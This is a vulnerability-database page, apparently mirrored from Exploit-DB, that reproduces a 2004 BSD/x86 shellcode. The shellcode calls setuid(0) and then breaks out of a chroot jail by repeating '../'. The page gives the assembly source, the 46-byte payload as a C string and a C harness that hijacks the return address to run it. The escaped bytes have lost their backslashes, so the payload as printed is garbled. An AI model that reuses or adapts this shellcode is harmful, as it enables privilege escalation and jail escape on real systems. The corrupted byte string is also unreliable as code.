BSD/x86 – setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)-安全小百科

BSD/x86 – setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)

漏洞ID	1054601	漏洞类型
发布时间	2004-09-12	更新时间	2004-09-12
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	BSD_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13453

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* The setuid(0)+chroot() shellcode
   it will put '../' 10 times
   Size  46 bytes
   OS	 *BSD
  		/rootteam/dev0id	(www.sysworld.net)
			[email protected] 

BITS	32

jmp short callme
main:
	pop	esi
	mov	edi,esi
	xor	ecx,ecx
	push	ecx
	mov	al,0x17
	push	eax
	int	0x80
	xor	eax,eax
	push	eax
	mov	cl,0x1e
	mov	al,0x2e
	repne   stosb
	pop	eax
	stosb
	mov	cl,0x1e
main_loop:
	dec	cl
	inc byte [esi+ecx]
	dec	cl
	loop	main_loop
	push 	esi
	mov	al,0x3d
	push	eax
	int	0x80
callme:
	call	main

*/
char shellcode[] =
	"xebx27x5ex89xf7x31xc9x51xb0x17x50xcdx80x31xc0"
	"x50xb1x1exb0x2exf2xaax58xaaxb1x1exfexc9xfex04"
	"x0exfexc9xe2xf7x56xb0x3dx50xcdx80xe8xd4xffxff"
	"xff";

int
main(void)
{
	int *ret;
	ret = (int*)&ret + 2;
	(*ret) = shellcode;
}

// milw0rm.com [2004-09-12]

相关推荐: Cooolsoft PowerFTP Server漏洞

Cooolsoft PowerFTP Server漏洞漏洞ID 1205086 漏洞类型未知发布时间 2001-11-28 更新时间 2001-11-28 CVE编号 CVE-2001-0933 CNNVD-ID CNNVD-200111-052 漏洞平…

文章版权归作者所有，未经允许请勿转载。

THE END